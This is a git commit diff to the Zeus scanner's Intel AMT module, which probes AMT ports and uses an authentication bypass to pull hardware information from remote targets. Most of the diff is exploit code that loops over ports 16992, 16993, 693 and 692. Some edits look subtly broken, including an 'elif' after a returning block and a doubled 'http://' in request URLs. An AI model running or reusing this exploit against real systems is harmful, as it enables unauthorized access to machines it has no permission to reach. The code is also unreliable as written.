patch for a reported issue (private) will now successfully search through the ports that may contain the AMT exploitable bypass

This commit is contained in:
ekultek 2017-11-07 12:22:53 -06:00
parent 55836461ea
commit 46930fd19c
4 changed files with 62 additions and 73 deletions

View file

@ -1,4 +1,4 @@
8885c0c94d4e4adfdc9b5f66c508a7e2 ./zeus.py
913ce06f47d730817768c6d434bccad9 ./zeus.py
4b32db388e8acda35570c734d27c950c ./etc/scripts/launch_sqlmap.sh
6ad5f22ec4a6f8324bfb1b01ab6d51ec ./etc/scripts/cleanup.sh
155c9482f690f1482f324a7ffd8b8098 ./etc/scripts/fix_pie.sh
@ -48,10 +48,10 @@ d41d8cd98f00b204e9800998ecf8427e ./lib/attacks/whois_lookup/__init__.py
629f935edac35716cf0cb3548f0cc86c ./lib/attacks/xss_scan/__init__.py
27358f26bda30d7356143c3ea1fa99c5 ./lib/attacks/nmap_scan/__init__.py
216999fa0e84866d5c1d96d5676034e4 ./lib/attacks/nmap_scan/nmap_opts.py
be3bcc949bb54e19c5b349c78a575c8c ./lib/attacks/intel_me/__init__.py
a0b5265f235a266f7a48874c3d1e08f9 ./lib/attacks/intel_me/__init__.py
1faa2b5dfad6eb538bbfe42942d2a9da ./lib/core/errors.py
d41d8cd98f00b204e9800998ecf8427e ./lib/core/__init__.py
5fcc4e1ddd394c1b4839025562fbc9d9 ./lib/core/settings.py
30112312eefcb5444d7916fb8f78142a ./lib/core/settings.py
d41d8cd98f00b204e9800998ecf8427e ./var/google_search/__init__.py
e9f1e2624154401840b0b118216ba82e ./var/google_search/search.py
d41d8cd98f00b204e9800998ecf8427e ./var/__init__.py

View file

@ -14,7 +14,7 @@ from lxml import html
from var.auto_issue.github import request_issue_creation
def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs):
def __get_auth_headers(target, port, **kwargs):
"""
get the authorization headers from the URL
"""
@ -24,20 +24,12 @@ def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs):
logger.info(set_color(
"header value not established, attempting to get bypass..."
))
for port in ports:
try:
if verbose:
logger.debug(set_color(
"trying on port {}...".format(port), level=10
))
source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
'connection': 'close', 'user-agent': agent
}, proxies=proxy)
return source
except Exception:
pass
source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
'connection': 'close', 'user-agent': agent
}, proxies=proxy)
return source
# Get digest and nonce and return the new header
if 'WWW-Authenticate' in source.headers:
elif 'WWW-Authenticate' in source.headers:
logger.info(set_color(
"header value established successfully, attempting authentication..."
))
@ -56,36 +48,27 @@ def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs):
return None
def __get_raw_data(target, page, agent=None, proxy=None, **kwargs):
def __get_raw_data(target, page, port, agent=None, proxy=None, **kwargs):
"""
collect all the information from an exploitable target
"""
possible_ports = (16992, 16993, 693, 692)
verbose = kwargs.get("verbose", False)
logger.info(set_color(
"attempting to get raw hardware information..."
))
for port in possible_ports:
try:
if verbose:
logger.debug(set_color(
"trying on port {}...".format(port), level=10
))
return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page),
headers={
'connection': 'close',
'Authorization': __get_auth_headers(target, verbose=verbose),
'user-agent': agent
}, proxies=proxy)
except Exception:
pass
return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page),
headers={
'connection': 'close',
'Authorization': __get_auth_headers(target, port, verbose=verbose),
'user-agent': agent
}, proxies=proxy)
def __get_hardware(target, agent=None, proxy=None, verbose=False):
def __get_hardware(target, port, agent=None, proxy=None, verbose=False):
"""
collect all the hardware information from an exploitable target
"""
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy, verbose=verbose)
req = __get_raw_data(target, 'hw-sys', port, agent=agent, proxy=proxy, verbose=verbose)
if not req.status_code == 200:
return None
logger.info(set_color(
@ -131,6 +114,7 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs):
verbose = kwargs.get("verbose", False)
proxy = proxy_string_to_dict(proxy) or None
agent = agent or DEFAULT_USER_AGENT
port_list = (16993, 16992, 693, 692)
if do_ip_address:
logger.warning(set_color(
"running against IP addresses may result in the targets refusing the connection...", level=30
@ -140,7 +124,7 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs):
))
try:
url = replace_http(url)
url = socket.gethostbyname(url)
url = "http://{}".format(socket.gethostbyname(url))
logger.info(set_color(
"discovered IP address {}...".format(url)
))
@ -153,39 +137,44 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs):
logger.info(set_color(
"attempting to connect to '{}' and get hardware info...".format(url)
))
try:
json_data = __get_hardware(url, agent=agent, proxy=proxy, verbose=verbose)
if json_data is None:
logger.error(set_color(
"unable to get any information, skipping...", level=40
for port in list(port_list):
if verbose:
logger.debug(set_color(
"trying on port {}...".format(port), level=10
))
pass
else:
print("-" * 40)
for key in json_data.keys():
print("{}:".format(str(key).capitalize()))
for item in json_data[key]:
print(" - {}: {}".format(item.capitalize(), json_data[key][item]))
print("-" * 40)
except requests.exceptions.ConnectionError as e:
if "Max retries exceeded with url" in str(e):
logger.error(set_color(
"failed connection, target machine is actively refusing the connection, skipping...", level=40
))
pass
else:
logger.error(set_color(
"failed connection with '{}', skipping...", level=40
))
pass
except Exception as e:
if "Temporary failure in name resolution" in str(e):
logger.error(set_color(
"failed to connect on '{}', skipping...".format(url), level=40
))
pass
else:
logger.exception(set_color(
"ran into exception '{}', cannot continue...".format(e), level=50
))
request_issue_creation()
try:
json_data = __get_hardware(url, port, agent=agent, proxy=proxy, verbose=verbose)
if json_data is None:
logger.error(set_color(
"unable to get any information, skipping...", level=40
))
pass
else:
print("-" * 40)
for key in json_data.keys():
print("{}:".format(str(key).capitalize()))
for item in json_data[key]:
print(" - {}: {}".format(item.capitalize(), json_data[key][item]))
print("-" * 40)
except requests.exceptions.ConnectionError as e:
if "Max retries exceeded with url" in str(e):
logger.error(set_color(
"failed connection, target machine is actively refusing the connection, skipping...", level=40
))
pass
else:
logger.error(set_color(
"failed connection with '{}', skipping...", level=40
))
pass
except Exception as e:
if "Temporary failure in name resolution" in str(e):
logger.error(set_color(
"failed to connect on '{}', skipping...".format(url), level=40
))
pass
else:
logger.exception(set_color(
"ran into exception '{}', cannot continue...".format(e), level=50
))
request_issue_creation()

View file

@ -44,7 +44,7 @@ PATCH_ID = str(subprocess.check_output(["git", "rev-parse", "origin/master"]))[:
CLONE = "https://github.com/ekultek/zeus-scanner.git"
# current version <major.minor.commit.patch ID>
VERSION = "1.1.20".format(PATCH_ID)
VERSION = "1.1.21.{}".format(PATCH_ID)
# colors to output depending on the version
VERSION_TYPE_COLORS = {"dev": 33, "stable": 92, "other": 30}

View file

@ -324,7 +324,7 @@ if __name__ == "__main__":
elif intel:
url = get_true_url(url)
return intel_me.main_intel_amt(
url, agent=agent_to_use,
url, agent=agent_to_use, verbose=opt.runInVerbose,
proxy=proxy_to_use, do_ip=opt.runAgainstIpAddress
)
elif admin: